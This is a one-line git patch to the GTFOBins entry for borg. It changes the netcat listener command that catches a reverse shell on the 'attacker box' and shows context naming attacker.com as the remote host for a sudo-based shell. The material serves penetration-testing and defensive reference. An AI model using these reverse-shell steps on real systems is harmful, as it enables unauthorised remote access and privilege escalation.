From 458b5d2b86b88572d7333f0a7e3dc60f4adcde96 Mon Sep 17 00:00:00 2001 From: JM Sanchez <77505889+jmrcsnchz@users.noreply.github.com> Date: Sun, 18 Aug 2024 23:47:21 +0800 Subject: [PATCH] Update borg.md --- _gtfobins/borg.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/borg.md b/_gtfobins/borg.md index 4f559e5..a934554 100644 --- a/_gtfobins/borg.md +++ b/_gtfobins/borg.md @@ -1,6 +1,6 @@ --- sudo: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + - description: Run `nc -lvnp 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345